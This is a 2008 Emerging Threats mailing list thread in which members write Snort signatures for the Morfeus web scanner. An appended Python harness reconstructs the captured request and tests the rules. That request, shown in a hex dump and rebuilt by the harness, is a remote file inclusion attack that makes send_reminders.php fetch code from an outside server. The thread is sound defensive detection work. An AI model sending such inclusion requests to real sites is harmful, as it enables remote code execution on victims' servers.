
List:       emerging-sigs
Subject:    [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7
From:       pppmarinho () gmail ! com (Pedro Marinho)
Date:       2008-10-06 13:16:32
Message-ID: ae49404b0810060616y2a0b899dgec52104b6fbacfa () mail ! gmail ! com

OK Matt, thank you.


2008/10/6, Matt Jonkman <jonkman at jonkmans.com>:
> 
> We have one for this, but I've simplified it a bit:
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB PHP
> Attack Tool Morfeus F Scanner"; flow:established,to_server;
> content:"User-Agent\: Morfeus "; nocase;
> reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm;
> classtype:web-application-attack; sid:2003466; rev:4;)
> 
> Thanks Pedro!
> 
> Matt
> 
> Pedro Marinho wrote:
> > Hello Guys,
> > 
> > I received an attack here, so looking at the payload I made this rule,
> > because I am quite sure we don't have a rule for this user agent.
> > 
> > 
> > payload
> > 
> > comprimento = 256
> > 
> > 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_
> > 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no
> > 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir
> > 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22
> > 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c
> > 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt?????
> > 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce
> > 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
> > 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
> > 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
> > 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
> > 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor
> > 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca
> > 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***.
> > 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne
> > 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close....
> > 
> > Rule:
> > 
> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
> > SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server;
> > content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner";
> > classtype:web-application-activity; sid:2008***; rev:1;)
> > 
> > PS: did anyone see this in his/her IDS?
> > 
> > 
> > ------------------------------------------------------------------------
> > 
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
> 
> PGP: http://www.jonkmans.com/mattjonkman.asc
> 
> 
> 
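Added example, not part of the thread above: a small Python harness that rebuilds the raw HTTP request from the hex dump Pedro posted and runs both signatures' content checks over it, to show why Matt's shorter, nocase version is the more robust one. The hex-dump parser, the minimal emulation of Snort's content syntax (|..| binary sections, backslash escapes, nocase), the lowercase variant and the benign request are my own constructions; the masked Host bytes ("**" in the post) are replaced with a constructed placeholder byte.

```python
import re
from typing import Dict, Optional, Tuple

# Hex dump as posted in the thread; bytes the poster masked with "**" stay "**" here.
POSTED_DUMP = """\
000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_
010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no
020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir
030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22
040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c
050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt?????
060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce
070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor
0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca
0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***.
0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne
0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close....
"""

# "OFF : " followed by exactly 16 byte tokens (hex pair or "**"), each with a trailing space;
# anchoring on the count keeps the ASCII column on the right from being mistaken for hex.
DUMP_LINE = re.compile(r"^[0-9a-fA-F]{3} : ((?:(?:[0-9a-fA-F]{2}|\*\*) ){16})")


def dump_to_bytes(dump: str, mask_byte: int = 0x2A) -> bytes:
    """Reassemble the raw request; masked '**' bytes become a constructed placeholder ('*')."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        for tok in m.group(1).split():
            out.append(mask_byte if tok == "**" else int(tok, 16))
    return bytes(out)


def snort_content_to_bytes(spec: str) -> bytes:
    """Minimal reading of Snort content syntax: |0d 0a| hex sections and backslash escapes."""
    out = bytearray()
    i = 0
    while i < len(spec):
        c = spec[i]
        if c == "|":                       # binary section, hex bytes until the closing '|'
            j = spec.index("|", i + 1)
            out.extend(bytes.fromhex(spec[i + 1:j]))
            i = j + 1
        elif c == "\\":                    # escaped character such as \: \; \" \\
            out.append(ord(spec[i + 1]))
            i += 2
        else:
            out.append(ord(c))
            i += 1
    return bytes(out)


def content_matches(payload: bytes, spec: str, nocase: bool = False) -> bool:
    """Emulate a single content: match, with nocase folding both sides."""
    needle = snort_content_to_bytes(spec)
    if nocase:
        return needle.lower() in payload.lower()
    return needle in payload


# The two content checks from the thread (rule names are labels of my own).
RULES: Dict[str, Tuple[str, bool]] = {
    "pedro_rev1": ("|0d 0a|User-Agent\\: Morfeus Fucking Scanner", False),
    "matt_sid2003466_rev4": ("User-Agent\\: Morfeus ", True),
}


def evaluate(payload: bytes) -> Dict[str, bool]:
    return {name: content_matches(payload, spec, nocase) for name, (spec, nocase) in RULES.items()}


def user_agent(payload: bytes) -> Optional[str]:
    """Pull the User-Agent header out of the reconstructed request for reporting."""
    head = payload.partition(b"\r\n\r\n")[0]
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"user-agent":
            return value.strip().decode("latin-1")
    return None


# Constructed inputs: a case-changed copy of the posted request and an ordinary browser request.
LOWERCASE_VARIANT = dump_to_bytes(POSTED_DUMP).replace(
    b"Morfeus Fucking Scanner", b"morfeus fucking scanner")
BENIGN_REQUEST = b"GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    req = dump_to_bytes(POSTED_DUMP)
    print("bytes:", len(req), "user-agent:", user_agent(req))
    for label, sample in (("posted", req), ("lowercase", LOWERCASE_VARIANT), ("benign", BENIGN_REQUEST)):
        print(label, evaluate(sample))
```

Run as a script it reconstructs the 256-byte request (matching the "comprimento = 256" line in the post), reports the User-Agent, and prints which checks fire: both fire on the posted request, only the nocase prefix fires when the scanner string changes case, and neither fires on the browser request. Pedro's rule also pins the match to the start of a header line with |0d 0a|, which is stricter but buys little here, while the trailing space in Matt's "Morfeus " keeps it from matching unrelated words that merely start with the same letters.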


